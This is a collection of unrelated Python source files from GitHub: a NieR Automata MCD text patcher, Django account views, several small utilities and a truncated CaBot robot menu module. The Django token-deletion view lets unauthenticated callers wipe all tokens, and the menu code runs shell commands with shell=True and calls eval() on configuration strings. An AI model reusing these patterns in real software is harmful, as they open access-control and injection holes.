ioUtils.read_int32(file)\n self.fonts_count = ioUtils.read_int32(file)\n self.events_offset = ioUtils.read_int32(file)\n self.events_count = ioUtils.read_int32(file)\n\n return self\n\n def write_file(self, file):\n ioUtils.write_Int32(file, self.messages_offset)\n ioUtils.write_Int32(file, self.messages_count)\n ioUtils.write_Int32(file, self.symbols_offset)\n ioUtils.write_Int32(file, self.symbols_count)\n ioUtils.write_Int32(file, self.glyphs_offset)\n ioUtils.write_Int32(file, self.glyphs_count)\n ioUtils.write_Int32(file, self.fonts_offset)\n ioUtils.write_Int32(file, self.fonts_count)\n ioUtils.write_Int32(file, self.events_offset)\n ioUtils.write_Int32(file, self.events_count)\n\nclass Line:\n struct_size = 24\n\n def from_mcd(self, file):\n content_offset = ioUtils.read_int32(file)\n self.padding = ioUtils.read_int32(file)\n content_length = ioUtils.read_int32(file)\n ioUtils.read_int32(file)\n self.below = ioUtils.read_float(file)\n self.horiz = ioUtils.read_float(file)\n\n last_pos = file.tell()\n self.content = []\n file.seek(content_offset)\n for i in range(content_length):\n val = ioUtils.read_int16(file)\n if val < -32000:\n val = val & 0xFFFF\n self.content.append(val)\n file.seek(last_pos)\n\n return self\n\n def to_string(self, symbols_glyph_Dict, font): # I stole this :) https://github.com/synspawacza/nier_automata_localization\n result = \"\"\n idx = 0\n while idx < len(self.content) - 1:\n char_id = self.content[idx]\n if char_id < 0x8000:\n result += symbols_glyph_Dict[char_id].char\n if symbols_glyph_Dict[char_id].font_id != font.id:\n raise Exception(\"Font mismatch\")\n idx += 2 # skip kerning\n elif char_id == 0x8001:\n result += \" \"\n #result += f\"[SET_FONT:{self.content[idx+1]}]\"\n idx += 2 # skip font id\n elif char_id == 0x8000:\n # text end\n idx += 1\n elif char_id == 0x8020:\n result += \"\"\n idx += 2\n else:\n # using '<' and '>' for tagging - hopefully it doesn't break anything\n result += \"\"\n idx += 2 # skip kerning\n return result\n\n def from_string(self, string, symbols, font, kernings):\n self.content = []\n self.padding = 0\n self.below = 0\n self.horiz = 0\n for i, char in enumerate(string):\n if (char == \" \"):\n self.content.append(0x8001)\n self.content.append(font.id)\n else:\n for symbol in symbols:\n if symbol.font_id != font.id:\n continue\n glyph_found = False\n if symbol.char == char:\n val = symbol.glyph_id\n glyph_found = True\n break\n self.below = font.below\n\n if not glyph_found:\n raise Exception(\"Glyph not found in font \" + str(font.id) + \": \" + char)\n self.content.append(val)\n\n # Get next char\n if i + 1 < len(string):\n next_char = string[i + 1]\n combined = char + next_char\n if combined in kernings[font.id]:\n self.content.append(round(kernings[font.id][combined][\"kerning_num\"]))\n else:\n self.content.append(0)\n else:\n self.content.append(0)\n\n self.content.append(0x8000)\n return self\n\nclass Text:\n struct_size = 20\n\n def from_mcd(self, file):\n lines_offset = ioUtils.read_int32(file)\n lines_count = ioUtils.read_int32(file)\n self.vpos = ioUtils.read_int32(file)\n self.hpos = ioUtils.read_int32(file)\n self.font = ioUtils.read_int32(file)\n\n last_pos = file.tell()\n self.lines = []\n file.seek(lines_offset)\n for i in range(lines_count):\n self.lines.append(Line().from_mcd(file))\n file.seek(last_pos)\n\n return self\n\n def from_json(self, json, symbols, fonts_dict, kernings):\n self.lines = []\n self.vpos = json[\"vpos\"]\n self.hpos = json[\"hpos\"]\n self.font = json[\"font\"]\n split_lines = json[\"line\"].split(\"\\n\")\n for line in split_lines:\n self.lines.append(Line().from_string(line, symbols, fonts_dict[self.font], kernings))\n\n return self\n\n def to_string(self, symbols_char_Dict, fonts_dict):\n return \"\\n\".join([line.to_string(symbols_char_Dict, fonts_dict[self.font]) for line in self.lines])\n\nclass Message:\n struct_size = 16\n\n def from_mcd(self, file):\n texts_offset = ioUtils.read_int32(file)\n texts_count = ioUtils.read_int32(file)\n self.seq_number = ioUtils.read_int32(file)\n self.event_id = ioUtils.read_int32(file)\n\n return_pos = file.tell()\n self.texts = []\n file.seek(texts_offset)\n for i in range(texts_count):\n self.texts.append(Text().from_mcd(file))\n file.seek(return_pos)\n\n return self\n\n def from_json(self, json, seq_number, symbols, fonts_dict, kernings):\n self.seq_number = seq_number\n self.event_name = json[\"event_name\"]\n self.event_id = hash_event_name(self.event_name)\n self.texts = []\n for text in json[\"texts\"]:\n self.texts.append(Text().from_json(text, symbols, fonts_dict, kernings))\n\n return self\n\nclass Symbol:\n struct_size = 8\n\n def from_mcd(self, file):\n self.font_id = ioUtils.read_int16(file)\n self.char = file.read(2).decode(\"utf-16-le\")\n self.glyph_id = ioUtils.read_int32(file)\n\n return self\n\nclass Event:\n struct_size = 40\n\n def from_mcd(self, file):\n self.id = ioUtils.read_int32(file)\n self.idx = ioUtils.read_int32(file)\n self.name = file.read(32).decode(\"utf-8\").rstrip(\"\\0\")\n\n return self\n\n def from_message(self, name, message_idx):\n self.id = hash_event_name(name)\n self.idx = message_idx\n self.name = name\n\n return self\n\nclass Font:\n struct_size = 20\n\n def from_mcd(self, file):\n self.id = ioUtils.read_int32(file)\n self.width = ioUtils.read_float(file)\n self.height = ioUtils.read_float(file)\n self.below = ioUtils.read_float(file)\n self.horiz = ioUtils.read_float(file)\n\n return self\n\nclass MCD:\n def from_mcd(self, file):\n self.header = Header().from_mcd(file)\n\n file.seek(self.header.messages_offset)\n self.messages = []\n for i in range(self.header.messages_count):\n self.messages.append(Message().from_mcd(file))\n\n file.seek(self.header.symbols_offset)\n self.symbols = []\n for i in range(self.header.symbols_count):\n self.symbols.append(Symbol().from_mcd(file))\n\n # Imma just skip over glyphs for now\n file.seek(self.header.glyphs_offset)\n self.glyphs = file.read(self.header.glyphs_count * 40)\n\n file.seek(self.header.fonts_offset)\n self.fonts = []\n for i in range(self.header.fonts_count):\n self.fonts.append(Font().from_mcd(file))\n\n file.seek(self.header.events_offset)\n self.events = []\n for i in range(self.header.events_count):\n self.events.append(Event().from_mcd(file))\n\n self.generate_events_Dict()\n self.generate_fonts_Dict()\n self.generate_symbols_char_Dict()\n self.generate_symbols_glyph_Dict()\n\n self.kernings = {}\n self.generate_kernings()\n\n return self\n\n def generate_events_Dict(self):\n self.events_Dict = {}\n for event in self.events:\n self.events_Dict[event.id] = event\n\n def generate_symbols_char_Dict(self):\n self.symbols_char_Dict = {}\n for symbol in self.symbols:\n self.symbols_char_Dict[symbol.char] = symbol\n\n def generate_symbols_glyph_Dict(self):\n self.symbols_glyph_Dict = {}\n for symbol in self.symbols:\n self.symbols_glyph_Dict[symbol.glyph_id] = symbol\n\n def generate_fonts_Dict(self):\n self.fonts_Dict = {}\n for font in self.fonts:\n self.fonts_Dict[font.id] = font\n\n # This function is gonked, should probably not use for now\n def generate_kernings(self):\n for font in self.fonts:\n self.kernings[font.id] = {}\n\n for message in self.messages:\n for text in message.texts:\n font = self.fonts_Dict[text.font]\n for line in text.lines:\n idx = 0\n while idx < len(line.content):\n val = line.content[idx]\n if val < 0x8000:\n char = self.symbols_glyph_Dict[val].char\n kerning = line.content[idx+1]\n if kerning != 0:\n next_val = line.content[idx+2]\n if next_val < 0x8000:\n next_char = self.symbols_glyph_Dict[next_val].char\n if char + next_char in self.kernings[font.id]:\n self.kernings[font.id][char + next_char][\"kerning_num\"] += kerning\n self.kernings[font.id][char + next_char][\"count\"] += 1\n else:\n self.kernings[font.id][char + next_char] = {\n \"kerning_num\": kerning,\n \"count\": 1\n }\n idx += 2\n elif val == 0x8001:\n idx += 2\n elif val == 0x8000:\n idx += 2\n\n for font in self.kernings.keys():\n for kerning in self.kernings[font].keys():\n self.kernings[font][kerning][\"kerning_num\"] /= self.kernings[font][kerning][\"count\"]\n\n #with open(\"kernings.json\", \"w\") as file:\n # json.dump(self.kernings, file, indent=4)\n\n def update_from_json(self, json):\n # Events\n self.events = []\n for i, message in enumerate(json[\"messages\"]):\n self.events.append(Event().from_message(message[\"event_name\"], i))\n self.events.sort(key=lambda x: x.id)\n self.generate_events_Dict()\n\n # Messages\n self.messages = []\n seq_number = json[\"starting_seq_number\"]\n for message in json[\"messages\"]:\n self.messages.append(Message().from_json(message, seq_number, self.symbols, self.fonts_Dict, self.kernings))\n seq_number += 1\n\n # Header\n self.header.messages_count = len(self.messages)\n self.header.events_count = len(self.events)\n\n def to_json(self):\n json_data = {}\n json_data[\"starting_seq_number\"] = self.messages[0].seq_number\n json_data[\"messages\"] = []\n\n for msg in self.messages:\n json_data[\"messages\"].append({\n \"event_name\": self.events_Dict[msg.event_id].name,\n \"texts\": []\n })\n for text in msg.texts:\n json_data[\"messages\"][-1][\"texts\"].append({\n \"vpos\": text.vpos,\n \"hpos\": text.hpos,\n \"font\": text.font,\n \"line\": text.to_string(self.symbols_glyph_Dict, self.fonts_Dict)\n })\n\n json_data[\"fonts\"] = []\n for font in self.fonts:\n json_data[\"fonts\"].append({\n \"id\": font.id,\n \"symbols\": []\n })\n for symbol in self.symbols:\n if symbol.font_id == font.id:\n json_data[\"fonts\"][-1][\"symbols\"].append({\n \"char\": symbol.char,\n \"glyph_id\": symbol.glyph_id\n })\n return json_data\n\n def write_file(self, file): # https://github.com/synspawacza/nier_automata_localization\n current_offset = Header.struct_size\n\n strings = []\n strings_offsets = []\n\n texts = []\n texts_offsets = []\n\n lines = []\n lines_offsets = []\n\n for message in self.messages:\n for text in message.texts:\n texts.append(text)\n for line in text.lines:\n strings.append(line.content)\n strings_offsets.append(current_offset)\n current_offset += len(line.content) * 2\n lines.append(line)\n current_offset += calc_eager_padding(current_offset, 4)\n\n # Update header offsets\n self.header.messages_offset = current_offset\n current_offset += self.header.messages_count * Message.struct_size\n current_offset += calc_eager_padding(current_offset, 4)\n\n for i in range(len(texts)):\n texts_offsets.append(current_offset + i * Text.struct_size)\n current_offset += len(texts) * Text.struct_size\n current_offset += calc_eager_padding(current_offset, 4)\n\n for i in range(len(lines)):\n lines_offsets.append(current_offset + i * Line.struct_size)\n current_offset += len(lines) * Line.struct_size\n current_offset += calc_eager_padding(current_offset, 4)\n\n self.header.symbols_offset = current_offset\n self.header.symbols_count = len(self.symbols)\n current_offset += self.header.symbols_count * Symbol.struct_size + 4\n\n self.header.glyphs_offset = current_offset\n current_offset += self.header.glyphs_count * 40 + 4\n\n self.header.fonts_offset = current_offset\n self.header.fonts_count = len(self.fonts)\n current_offset += self.header.fonts_count * Font.struct_size + 4\n\n self.header.events_offset = current_offset\n\n # Write header\n self.header.write_file(file)\n \n # Write strings\n for string in strings:\n for v in string:\n val = v\n if val < 0:\n ioUtils.write_Int16(file, val)\n else:\n ioUtils.write_uInt16(file, val)\n file.write(write_eager_padding(file.tell(), 4))\n\n # Write messages\n texts_offset_idx = 0\n for message in self.messages:\n texts_offset = texts_offsets[texts_offset_idx]\n texts_offset_idx += len(message.texts)\n ioUtils.write_uInt32(file, texts_offset)\n ioUtils.write_uInt32(file, len(message.texts))\n ioUtils.write_uInt32(file, message.seq_number)\n ioUtils.write_uInt32(file, message.event_id)\n file.write(write_eager_padding(file.tell(), 4))\n\n # Write texts\n lines_offset_idx = 0\n for text in texts:\n lines_offset = lines_offsets[lines_offset_idx]\n lines_offset_idx += len(text.lines)\n ioUtils.write_uInt32(file, lines_offset)\n ioUtils.write_uInt32(file, len(text.lines))\n ioUtils.write_uInt32(file, text.vpos)\n ioUtils.write_uInt32(file, text.hpos)\n ioUtils.write_uInt32(file, text.font)\n file.write(write_eager_padding(file.tell(), 4))\n\n # Write lines\n strings_idx = 0\n for line in lines:\n strings_offset = strings_offsets[strings_idx]\n strings_idx += 1\n ioUtils.write_uInt32(file, strings_offset)\n ioUtils.write_uInt32(file, line.padding)\n ioUtils.write_uInt32(file, len(line.content))\n ioUtils.write_uInt32(file, len(line.content))\n ioUtils.write_float(file, line.below)\n ioUtils.write_float(file, line.horiz)\n file.write(write_eager_padding(file.tell(), 4))\n\n # Write symbols\n for symbol in self.symbols:\n ioUtils.write_uInt16(file, symbol.font_id)\n ioUtils.write_utf16(file, symbol.char, 2)\n ioUtils.write_uInt32(file, symbol.glyph_id)\n file.write(write_eager_padding(file.tell(), 4))\n\n # Write glyphs\n file.write(self.glyphs)\n file.write(write_eager_padding(file.tell(), 4))\n\n # Write fonts\n for font in self.fonts:\n ioUtils.write_uInt32(file, font.id)\n ioUtils.write_float(file, font.width)\n ioUtils.write_float(file, font.height)\n ioUtils.write_float(file, font.below)\n ioUtils.write_float(file, font.horiz)\n file.write(write_eager_padding(file.tell(), 4))\n\n # Write events\n for event in self.events:\n ioUtils.write_uInt32(file, event.id)\n ioUtils.write_uInt32(file, event.idx)\n ioUtils.write_utf8(file, event.name, 32)\n\n \ndef mcd_to_json(mcd_file, out_file=None):\n with open(mcd_file, 'rb') as file:\n mcd = MCD().from_mcd(file)\n\n if out_file is None:\n out_file = os.path.splitext(mcd_file)[0] + \".json\"\n\n with open(out_file, \"w\", encoding=\"utf8\") as f:\n json_data = mcd.to_json()\n json_str = json.dumps(json_data, indent=4, ensure_ascii=False)\n f.write(json_str)\n\n print(\"Wrote\", out_file)\n\ndef json_to_mcd(json_file, mcd_file, out_file=None):\n with open(mcd_file, 'rb') as file:\n mcd = MCD().from_mcd(file)\n\n #org_mcd = copy.deepcopy(mcd)\n mcd.update_from_json(json.load(open(json_file, \"r\", encoding=\"utf8\")))\n\n if out_file is None:\n out_file = os.path.splitext(json_file)[0] + \".mcd\"\n\n with open(out_file, \"wb\") as file:\n mcd.write_file(file)\n\n print(\"Wrote\", out_file)\n\ndef print_usage():\n print(\"Usage:\\tmcd.py [output json file]\"\n \"\\n\\tmcd.py [output mcd file]\"\n \"\\nInfo:\\t- If no output file is specified, the input file name will be used with the appropriate extension.\"\n \"\\n\\t- is used as the base for fonts/glyphs used in the new mcd file.\")\n sys.exit(1)\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print_usage()\n\n if sys.argv[1] in [\"-h\", \"--help\"]:\n print_usage()\n\n in_file = sys.argv[1]\n\n in_file = os.path.normpath(in_file)\n in_file_ext = os.path.splitext(in_file)[1]\n\n # MCD to JSON\n if in_file_ext == \".mcd\":\n out_file = None\n if len(sys.argv) > 2:\n out_file = sys.argv[2]\n out_file = os.path.normpath(out_file)\n\n mcd_to_json(in_file, out_file)\n \n # JSON to MCD\n if in_file_ext == \".json\":\n if len(sys.argv) < 3:\n print_usage()\n \n mcd_file = sys.argv[2]\n mcd_file = os.path.normpath(mcd_file)\n\n out_file = None\n if len(sys.argv) > 3:\n out_file = sys.argv[3]\n out_file = os.path.normpath(out_file)\n\n json_to_mcd(in_file, mcd_file, out_file)","repo_name":"WoefulWolf/Automata_MCD_Patcher","sub_path":"mcd.py","file_name":"mcd.py","file_ext":"py","file_size_in_byte":20322,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"5139614352","text":"from django.shortcuts import render\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.response import Response\nfrom django.contrib.auth.models import User\nfrom account.serializers import AccountSerializer\nfrom rest_framework import status\nfrom rest_framework import exceptions\nfrom django.contrib.auth import hashers\nfrom rest_framework.permissions import IsAuthenticated, AllowAny\nfrom rest_framework.authtoken.models import Token\n\n\n# Create your views here.\nclass Register(GenericAPIView):\n \"\"\"\n 注册用户的视图\n \"\"\"\n queryset = User.objects.all()\n serializer_class = AccountSerializer\n\n def get(self, request):\n data = self.get_queryset()\n return Response(status.HTTP_403_FORBIDDEN) # 返回403禁止访问这个路由\n\n def post(self, request):\n data = request.data\n if isinstance(data, dict): # 一次只能创建一个用户,其他情况直接400\n many = False\n else:\n return Response(status.HTTP_400_BAD_REQUEST)\n serializer = self.get_serializer(data=request.data, many=many)\n serializer.is_valid(raise_exception=True) # 校验是否合法\n serializer.save()\n user = {\n 'username': serializer.data['username'], # 返回用户名\n 'is_active': serializer.data['is_active'] # 返回密码\n }\n return Response(user)\n\n\nclass DeleteUser(GenericAPIView):\n \"\"\"\n 删除用户的视图\n \"\"\"\n queryset = User.objects.all()\n serializer_class = AccountSerializer\n\n @staticmethod\n def is_existence(self, request):\n existence = True # 原始设置为True,不存在用户,密码不对都设置为False\n data = request.data\n username = data['username']\n password = data['password']\n result_factual = User.objects.filter(username=username) # 筛选是否存在该用户\n if len(result_factual) == 1:\n result = self.get_queryset() # 找到表中所有用户\n result = self.get_serializer(result, many=True)\n for i in result.data: # 循环找到前端传来的user信息\n if username == i['username']:\n temp_password = i['password']\n if hashers.check_password(password, temp_password): # 密码存在,校验通过,执行删除\n result_factual.delete() # 将查询到的用户结果删除\n else:\n raise exceptions.ValidationError('密码不正确!')\n existence = False\n break\n else:\n pass\n\n else:\n raise exceptions.ValidationError('不存在该用户!')\n existence = False # 不存在该用户,设置为False\n\n return existence\n\n def delete(self, request):\n if self.is_existence(self, request=request):\n detail = request.data['username'] + '已被删除!'\n return Response(detail)\n\n\nclass DeleteToken(GenericAPIView):\n queryset = Token.objects.all()\n\n permission_classes = [AllowAny]\n\n @staticmethod\n def delete_one_or_delete_all(self, request):\n \"\"\"\n 删除token\n \"\"\"\n token = request.auth\n user = request.user\n if token is not None:\n \"\"\"\n 如果前端传来一个参数token,则删除单个,否则删除所有token\n \"\"\"\n data = Token.objects.filter(key=token)\n if len(data) == 1:\n data.delete()\n return str(token) + '已被删除!'\n else:\n raise exceptions.ValidationError('不存在的token!')\n else:\n Token.objects.all().delete()\n return '所有token已被删除!'\n\n def delete(self, request):\n text = self.delete_one_or_delete_all(self, request)\n if text:\n return Response(text)","repo_name":"kaedePing/lightnovel","sub_path":"LightNovel/account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72390499946","text":"from setuptools import setup, Extension\nfrom Cython.Build import cythonize\n\nextensions = [\n Extension(\"simplehod.simplehod\", [\"simplehod/simplehod.pyx\"])\n]\n\nsetup(\n name=\"simplehod\",\n version=\"0.0.1\",\n author=\"Yu Feng\",\n author_email=\"rainwoodman@gmail.com\",\n url=\"http://github.com/bccp/simplehod\",\n description=\"Simple HOD modelling of galaxy from simulation catalogs\",\n install_requires=['cython', 'numpy'],\n license='BSD-2-Clause',\n zip_safe = False,\n package_dir = {'simplehod': 'simplehod'},\n packages=['simplehod'],\n ext_modules = cythonize(extensions),\n)\n\n","repo_name":"bccp/simplehod","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15345113886","text":"def gen_to_tax(tax_rate):\n def to_tax(price):\n return price * (1 + tax_rate)\n return to_tax\n\nto_tax8 = gen_to_tax(0.08)\nto_tax10 = gen_to_tax(0.1)\n\nprint(to_tax8(1000))\nprint(to_tax8(2000))\nprint(to_tax10(1000))\nprint(to_tax10(2000))\n","repo_name":"kronos-fujimaru/python_intro","sub_path":"text/exercise/answers/06/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26486929863","text":"class Mascota:\n def __init__(self):\n self.codigo = []\n self.nombre = []\n self.edad = []\n self.animal = []\n self.raza = []\n self.vacuna = []\n self.estado = []\n def menu(self):\n opciones = \"\"\"\n *******SISTEMA DE MASCOTAS*******\n 1.- Registrar Mascotas\n 2.- Kardex de Mascotas\n 3.- Vacunar Mascota\n 4.- Salir\n \"\"\"\n print(opciones)\n eleccion = int(input(\"Elija una opcion del menu: \\n\"))\n if(eleccion == 1):\n print(self.agregarMascota())\n self.menu()\n elif (eleccion == 2):\n print(self.kardex())\n print(self.verMenu())\n elif (eleccion ==3):\n print(self.agregarVacuna())\n print(self.verMenu())\n elif(eleccion==4):\n print(\"Transacciones realizadas correctamente\")\n else:\n print(\"***DIGITE UNA OPCION DEL MENU***\")\n self.menu()\n\n def verMenu(self):\n eleccion = input(\"Desea volver al menu: s/n \\n\")\n if (eleccion == 's' or eleccion == 'S'):\n self.menu()\n else:\n return \"Transacciones realizadas correctamente\"\n\n def agregarMascota(self):\n print(\"***AGREGAR MASCOTAS***\")\n code = input(\"Ingrese el codigo para la mascota: \\n\")\n name = input(\"Ingrese el nombre su mascota: \\n\")\n age = int(input(\"Ingrese la edad en meses: \\n\"))\n animal = input(\"Ingrese el tipo de animal de su mascota: \\n\")\n type = input(\"Ingrese la raza: \\n\")\n print(self.guardarMascota(code, name, age, animal, type))\n agregarOtro = input(\"Desea registrar mascota.? s/n \\n\")\n if ( agregarOtro == 's' or agregarOtro == 'S'):\n self.agregarMascota()\n return \"Mascota(s) registrada(s) correctamente.!\"\n\n def guardarMascota(self, codigo, nombre, edad, animal, raza):\n self.codigo.append(codigo)\n self.nombre.append(nombre)\n self.edad.append(edad)\n self.animal.append(animal)\n self.raza.append(raza)\n self.vacuna.append(0)\n self.estado.append(1)\n return \"La mascota {} fue registrada exitosamente.!\".format(nombre)\n def kardex(self):\n if (self.codigo):\n for posicion in range(len(self.nombre)):\n self.descripcion(posicion)\n return \"Kardex cargado correctamente\"\n else:\n return \"Todavia no hay datos registrados\"\n\n\n def descripcion(self, posicion):\n print(\"****MASCOTA {}***\".format(self.codigo[posicion]))\n print(\"Nombre: {} \".format(self.nombre[posicion]))\n print(\"Edad: {} meses\".format(self.edad[posicion]))\n print(\"Tipo Animal: {}\".format(self.animal[posicion]))\n print(\"Raza: {}\".format(self.raza[posicion]))\n if (self.vacuna[posicion] == 1 ):\n print(\"Vacunado: SI\".format(self.vacuna[posicion]))\n else:\n print(\"Vacunado: NO\".format(self.vacuna[posicion]))\n pass\n def buscarMascota(self):\n codigo = input(\"Ingrese el codigo de la mascota: \\n\")\n posicion = self.codigo.index(codigo)\n return posicion\n\n def agregarVacuna(self):\n posicion = self.buscarMascota()\n return self.vacunarMascota(posicion)\n\n def vacunarMascota(self, posicion):\n self.vacuna[posicion] = 1\n return \"La mascota {} fue vacunada exitosamente.!\".format(self.nombre[posicion])\n\nmascotas = Mascota()\nmascotas.menu()\n","repo_name":"amilkarcruz13/class-on-python-programing-III-upc-2020","sub_path":"mascotas.py","file_name":"mascotas.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"es","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"39384035334","text":"from os.path import basename\nfrom os.path import exists\nfrom os.path import isfile\nfrom pathlib import Path\nfrom shutil import rmtree\n\nimport cv2\n\n\ndef video_to_frames(video_filename, output_dir, skip_if_dir_exists=False):\n print(\"Start extracting frames from {} to {}\".format(video_filename, output_dir))\n output_dir_path = Path(output_dir)\n video_basename = basename(video_filename).split('.')[0]\n if skip_if_dir_exists is True and output_dir_path.exists():\n print(\n \"Frame directory '{}' exists. \"\n \"Skipping extracting frames from {}\".format(output_dir, video_filename)\n )\n return\n\n if output_dir_path.exists():\n rmtree(output_dir)\n\n output_dir_path.mkdir(0o777, parents=True, exist_ok=False)\n\n if exists(video_filename) and isfile(video_filename):\n print(\"File {} exists\".format(video_filename))\n else:\n print(\"File {} does not exist!\".format(video_filename))\n\n vidcap = cv2.VideoCapture(str(video_filename))\n print(\"VideoCapture of {} created? {}\".format(video_filename, vidcap.isOpened()))\n\n if not vidcap.isOpened():\n raise IOError\n\n success, image = vidcap.read()\n count = 0\n print(\n \"Extracting frames from video '{}' to folder '{}'...\".format(\n video_filename, output_dir\n )\n )\n while success:\n cv2.imwrite(f\"{output_dir}/{video_basename}_frame-{count:05d}.png\", image)\n success, image = vidcap.read()\n count += 1\n\n print(f\"{count} frames extracted\")","repo_name":"backup-test-123/flytekubecondemo2019","sub_path":"demoproject/utils/video_tools/video_to_frames.py","file_name":"video_to_frames.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29878414552","text":"import json\nimport subprocess\nimport os\nimport traceback\n\nfrom cabot_ui.cabot_rclpy_util import CaBotRclpyUtil\nimport std_msgs.msg\nfrom rcl_interfaces.msg import Parameter, ParameterType, ParameterValue\nfrom rcl_interfaces.srv import SetParameters, GetParameters\nfrom rclpy.callback_groups import MutuallyExclusiveCallbackGroup\nfrom rclpy.qos import QoSProfile, DurabilityPolicy\nimport rclpy.parameter\n\nimport cabot_common.util\nfrom cabot_ui import i18n\n\nclass Action(object):\n \"\"\"Menu Action abstract class\"\"\"\n def __init__(self, config, menu):\n self._menu = menu\n self._config = config\n\n def do_action(self):\n \"\"\"need to implement do_action in concreate class\"\"\"\n return False\n\nclass Actions(Action):\n \"\"\"Lisf of Actions\"\"\"\n @staticmethod\n def create_actions(config, menu):\n \"\"\"create menu action classes\"\"\"\n actions = Menu.get_menu_config(config, \"actions\")\n\n return Actions(actions, menu)\n\n def __init__(self, config, menu):\n super(Actions, self).__init__(config, menu)\n temp = []\n if config:\n for action in config:\n _type = Menu.get_menu_config(action, \"type\", error=True)\n \n if _type == \"publish_topic\":\n temp.append(PublishTopicAction(action, menu))\n elif _type == \"reconfigure\":\n temp.append(ReconfigureAction(action, menu))\n elif _type == \"syscommand\":\n temp.append(SyscommandAction(action, menu))\n else:\n raise RuntimeError(\"%s action is not defined\" % (_type))\n\n temp.append(MenuSelectAction(None, menu))\n\n self.actions = temp\n\n def do_action(self):\n result = True\n for action in self.actions:\n result = result and action.do_action()\n return result\n\n def __str__(self):\n return str(self.actions)\n\ndef my_import(name):\n components = name.split('.')\n mod = __import__(components[0])\n for comp in components[1:]:\n mod = getattr(mod, comp)\n return mod\n\nclass PublishTopicAction(Action):\n \"\"\"Menu Action for publishing topic\"\"\"\n def __init__(self, config, menu):\n super(PublishTopicAction, self).__init__(config, menu)\n self._topic = Menu.get_menu_config(config, \"topic\", error=True)\n msg_type_str = Menu.get_menu_config(config, \"msg_type\", default=\"std_msgs.msg.String\")\n self._msg_type = my_import(msg_type_str)\n \n if self._topic is not None:\n ### needs to update with custom message typep\n latching_qos = QoSProfile(depth=1,\n durability=DurabilityPolicy.TRANSIENT_LOCAL)\n self._pub = CaBotRclpyUtil.instance().node.create_publisher(self._msg_type, self._topic, qos_profile=latching_qos)\n\n def do_action(self):\n curr = self._menu.value\n if curr is not None:\n if isinstance(curr, Menu):\n curr = curr.value\n if curr is not None:\n msg = self._msg_type()\n msg.data = curr\n self._pub.publish(msg)\n return True\n return False\n\n\nclass ReconfigureAction(Action):\n \"\"\"Menu Action for reconfiguration\"\"\"\n def __init__(self, config, menu):\n super(ReconfigureAction, self).__init__(config, menu)\n self._targets = Menu.get_menu_config(config, \"targets\", error=True)\n self._error_count = 0\n\n _clients = {}\n\n def do_action(self):\n for target in self._targets:\n target_name = target[\"name\"]\n if target_name not in ReconfigureAction._clients:\n try:\n CaBotRclpyUtil.info(\"Trying to connect set_paraeters client\")\n\n ReconfigureAction._clients[target_name] = CaBotRclpyUtil.instance().node.create_client(SetParameters, f\"/{target_name}/set_parameters\")\n ReconfigureAction._clients[target_name].wait_for_service(timeout_sec=3.0)\n except:\n CaBotRclpyUtil.info(\"Timed out connecting set_parameters client\")\n\n #return True\n if target_name in ReconfigureAction._clients:\n client = ReconfigureAction._clients[target_name]\n config = target[\"config\"]\n if client is not None:\n req = SetParameters.Request()\n for key in config:\n val = config[key]\n if isinstance(val, (float,int)):\n value = val * self._menu.value\n elif isinstance(val, str):\n # TODO (security issue)\n value = eval(val)\n\n param = Parameter()\n param.name = key\n param.value = ParameterValue(value)\n req.parameters.append(param)\n\n result = client.call(req)\n CaBotRclpyUtil.info(f\"{result}\")\n return True\n self._error_count += 1\n if self._error_count > 10:\n raise RuntimeError(\"dynamic_reconfigure server is not responded\")\n return False\n\nclass SyscommandAction(Action):\n \"\"\"Menu Action for system command\"\"\"\n def __init__(self, config, menu):\n super(SyscommandAction, self).__init__(config, menu)\n self._command = Menu.get_menu_config(config, \"command\", error=True)\n\n def do_action(self):\n try:\n CaBotRclpyUtil.info(\"do_action for system command\")\n command = self._command % (self._menu.value)\n CaBotRclpyUtil.info(command)\n process = subprocess.Popen(command, preexec_fn=os.setsid, shell=True)\n process.wait(timeout=1)\n except:\n CaBotRclpyUtil.error(traceback.format_exc())\n return False\n return True\n\nclass Event(object):\n def __init__(self, origin, value):\n self.origin = origin\n self.value = value\n\nclass MenuSelectAction(Action):\n \"\"\"Menu Select Action\"\"\"\n def __init__(self, config, menu):\n super(MenuSelectAction, self).__init__(config, menu)\n\n def do_action(self):\n self._menu._menu_selected(self._menu)\n return True\n\nclass Menu(object):\n \"\"\"Menu class\"\"\"\n Undefined = 0\n List = 1\n Action = 2\n Adjust = 3\n\n def _get_path(self, name):\n return \".\".join([\"persistent\", name])\n\n def _get_saved_config(self, name, default=None):\n try:\n self.get_client.wait_for_service(timeout_sec=3.0)\n path = self._get_path(name)\n \n req = GetParameters.Request()\n req.names.append(path)\n \n CaBotRclpyUtil.info(f\"getting the param {path}\")\n result = self.get_client.call(req)\n CaBotRclpyUtil.info(f\"got the result {result}\")\n if len(result.values) == 1:\n return rclpy.parameter.parameter_value_to_python(result.values[0])\n CaBotRclpyUtil.error(\"cannot get the parameter\")\n except:\n if default is not None:\n self._save_config(name, default)\n return default\n\n def _save_config(self, name, value):\n CaBotRclpyUtil.info(\"save config\")\n try:\n CaBotRclpyUtil.info(f\"setting the param {name}: {value}\")\n self.set_client.wait_for_service(timeout_sec=3.0)\n path = self._get_path(name)\n CaBotRclpyUtil.info(f\"setting the param {path}: {value}\")\n req = SetParameters.Request()\n param = rclpy.parameter.Parameter(path, value=value).to_parameter_msg()\n req.parameters.append(param)\n result = self.set_client.call(req)\n CaBotRclpyUtil.info(f\"{result}\")\n except:\n CaBotRclpyUtil.error(traceback.format_exc())\n CaBotRclpyUtil.error(\"cannot save the parameter\")\n\n @staticmethod\n def get_menu_config(config, name, default=None, 